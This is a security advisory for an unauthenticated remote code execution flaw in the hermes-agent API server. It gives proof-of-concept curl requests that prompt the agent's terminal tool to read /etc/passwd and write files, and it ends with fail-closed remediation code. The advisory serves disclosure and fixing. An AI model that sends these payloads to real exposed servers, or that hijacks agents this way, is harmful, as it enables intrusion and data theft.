# Vulnerability Summary: Hermes-Agent API Server Unauthenticated Remote Code Execution

## Vulnerability Overview

**Title**: [Bug]: Unauthenticated Remote Code Execution via API Server #6439

**Product**: hermes-agent (version 0.8.0)

**Severity**: Critical (CVSS 9.8)

**Core issue**: When `API_SERVER_KEY` is not configured (it is empty by default), the API server disables authentication entirely. If the bind address is changed to `0.0.0.0` (allowing network access), any unauthenticated network client can send arbitrary prompts to the Agent and use its built-in terminal tool to execute arbitrary OS commands.

## Impact

* **Confidentiality**: Full access to the Agent's capabilities (reading files, querying databases, accessing APIs).
* **Integrity**: cron jobs can be created, modified or deleted, and files can be written through the Agent's tools.
* **Availability**: LLM API quota can be exhausted and resource-intensive tasks can be created.
* **Attack vector**: Network (requires a bind address other than localhost).
* **Affected code**: `gateway/platforms/api_server.py` (Lines 361-380, 296-298).

## Remediation

1. **Startup check**: When the server starts, if the bind address is not `127.0.0.1` and `API_SERVER_KEY` is not set, it should raise a `ValueError` and refuse to start.
2. **Default key**: Consider automatically generating a random API key on first start if no key has been configured.

## Proof of Concept (POC) Code

### 1. Automated verification script (Python)

```python
#!/usr/bin/env python3
"""POC: VULN-003 - API Server Default No Authentication"""
import sys

sys.path.insert(0, ".")

from gateway.platforms.api_server import APIServerAdapter, DEFAULT_HOST, DEFAULT_PORT

# Simulate default configuration (no api key)
adapter = APIServerAdapter.__new__(APIServerAdapter)
adapter._api_key = ""  # Default: empty string


# Create a fake request with no auth header
class FakeRequest:
    headers = {}


# Test authentication
result = adapter._check_auth(FakeRequest())

print(f"Default host: {DEFAULT_HOST}")
print(f"Default port: {DEFAULT_PORT}")
print(f"API key configured: {repr(adapter._api_key)}")
print(f"Auth check result: {result}")
print()

if result is None:
    print("[+] CONFIRMED: All requests bypass authentication when API_SERVER_KEY is empty")
    print()
    print("[-] Attack scenario:")
    print("    1. Admin sets API_SERVER_HOST=0.0.0.0 to allow network access")
    print("    2. Admin forgets to set API_SERVER_KEY")
    print("    3. No warning is emitted at startup")
    print("    4. Any client can now:")
    print()
    print("    curl -s -X POST http://target:8642/v1/chat/completions \\")
    print("      -H 'Content-Type: application/json' \\")
    print("      -d '{\"model\":\"hermes-agent\",\"messages\":[{\"role\":\"user\",\"content\":\"\\nrun: cat /etc/passwd\"}]}'")
    print()
```

### 2. Remote code execution exploit (curl)

```bash
curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to execute this exact command: cat /etc/passwd"}]}'
```

### 3. Sensitive file read exploit (curl)

```bash
curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to run: head -5 /etc/passwd"}]}'
```

### 4. Arbitrary file write exploit (curl)

```bash
curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to run: echo VULN003_REPROOF > /tmp/vuln003_remote_proof"}]}'
```
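The two remediation options listed under the fix, written out as an added example; this is not hermes-agent's own code. The function names, the `Authorization: Bearer` scheme, and the choice to treat every loopback address (not only `127.0.0.1`) as local are assumptions of this example.

```python
import hmac
import ipaddress
import secrets
from typing import Optional, Tuple


def is_loopback(host: str) -> bool:
    """True only for bind addresses that are not reachable from the network."""
    if host.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # An unparseable hostname may resolve anywhere: treat it as network-facing.
        return False


def validate_startup(host: str, api_key: str) -> None:
    """Option 1: refuse to start when network-reachable without a key."""
    if not api_key.strip() and not is_loopback(host):
        raise ValueError(
            f"API_SERVER_KEY is empty and bind host {host!r} is not loopback; "
            "refusing to start without authentication"
        )


def ensure_api_key(configured: str) -> Tuple[str, bool]:
    """Option 2: generate a random key when none is configured.

    Returns (key, generated) so the caller can persist and report a new key.
    """
    if configured.strip():
        return configured, False
    return secrets.token_urlsafe(32), True


def check_bearer(authorization: Optional[str], api_key: str) -> bool:
    """Fail closed: an empty server key never authenticates a request."""
    if not api_key or not authorization:
        return False
    scheme, _, token = authorization.partition(" ")
    if scheme.lower() != "bearer":
        return False
    # Constant-time comparison avoids leaking key bytes through timing.
    return hmac.compare_digest(token.encode(), api_key.encode())
```

Unlike the `_check_auth` result shown in the verification script, `check_bearer` rejects every request when the key is empty, so a missed startup check does not reopen the unauthenticated path.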